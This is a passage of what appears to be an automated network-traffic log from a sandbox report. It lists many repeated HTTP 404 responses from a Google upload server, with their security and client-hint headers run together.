UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7lMppWOlM3xo9lfPJ7DhxAMiouHuPfxrl4hPw89Hq-1HfFsTsdnPwkHmkbJabjVW1pContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:28:23 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-7CsTRVnb4WasGqGK96J1jg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgT2Tz-nLzfeouiVMgcteM6clqyKurOgG0pxibDr2J-_vv4rYGkrLgy9wNiZWKdMJMBHtpOv-HMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:28:26 GMTContent-Security-Policy: script-src 'nonce-X6FZ-3sKC4xX1WAH8kl5vQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQdg3TVMX-a_iPYLkbx62FkNZvU-ShDRB7Od-cL7zyNH_2A1-OU21lheM8M_RrhuAlhContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:28:28 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-CvaZZ2HMnDn9pXKW8Navpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSW7B4xK-iM24x1n-HxQhtt6NgWM2W9XbogRsDXtHAuD_k4XzDtHGH1gjsyCslUyLHcBBy_IvYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:28:30 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-FkxsjrcmzWo7SotIYkIFbw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4YvSTyLvi0CHL0tZXnnkol2CqB8On034g77pEMzV8QZoiWHEe3vQ1KsBmFGXOBMP--Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:28:33 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-Qr5xjXmzfhZr6GIhcbLtjA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSIL3L3et1jcTSjYxsyVm7jljsm6mguYH2OPW7zI44BbsZwkRdo05na2bmIgphK8NDAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:28:35 GMTContent-Security-Policy: script-src 'nonce-4mIxTvIU7EfXXX7pBguplg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSqY9Ex58tWnsi2z_d5zEYnAMyqUZj6HWOrkR5rFGKq2IOoA8_R8u2nzeyJq8GQCDUwkyuRz5wContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:28:37 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-7YRXiIlHp7-usUVliTPDWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTUaiXexMFMCoqCIRTPADVtnnGXbcwmvIAlF7t7uJj3I6uskdOJpSTaGwWg5q0Ov28F-f83TAUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:28:40 GMTContent-Security-Policy: script-src 'nonce-3jU07yO4HtuUjBlGMVnmmA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQjEfiC34FFgvbldZVzkNM8SdDcyeU9WwPbnC0tT-a_HHKqPBMFTQ9zZ_bS-46aJy3VkkbndnUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:28:42 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce--AE7jvXM4bG0xUBd2gWfgA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC41tdIZqWj2bJ9wxsCGeSj8fxuPMMV2NO7OKsxb5MghtivueGKB1A7M3sQkj3p39owpTNbcomsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:28:44 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-07V-w6NUHALSx7f_8lMhig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgReaQ4vW_gm9KMDtxSwu4swMG04TGFzMfNO1Rw_TIwdOy7lJOY50G1hHo2_tQIgGCh-Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:28:47 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-NZxBQpieEWax83cT-Pyptg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRkmIAMlVcYHpK3iY-s1TKO0mVvpYHIJDELoOBL8JBsuWXHBJbAISvxi0jw8C5Q56ROContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:28:49 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-G17mHrrdCPJTaSnUkjj-Rg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTNrnN8o8l8VfOKBCFiTG82L0PDpFCMu2bqAn80o_z8fWYs32ddZh28UwI24Uy6lKVZP8soGB8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:28:51 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-PWz03kX-0s5EO-LAHtJd6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC76krFNKrWk2era1CLv4MbRxEgmz_nfuGCHq1RVD8g1_UWo3K6LSMp6nc3tgQK0KapKContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:28:54 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-wnKkzTf98lew9WJKLRDlxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5JyON8aNtOox4u7xav2NZ84Q8nsp5H9-BaLv35dhSk0iulRMLbe4Ez5kv8y2LueJZvContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:28:56 GMTContent-Security-Policy: script-src 'nonce-BGOonSUYkufnMVzv9c35tA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, 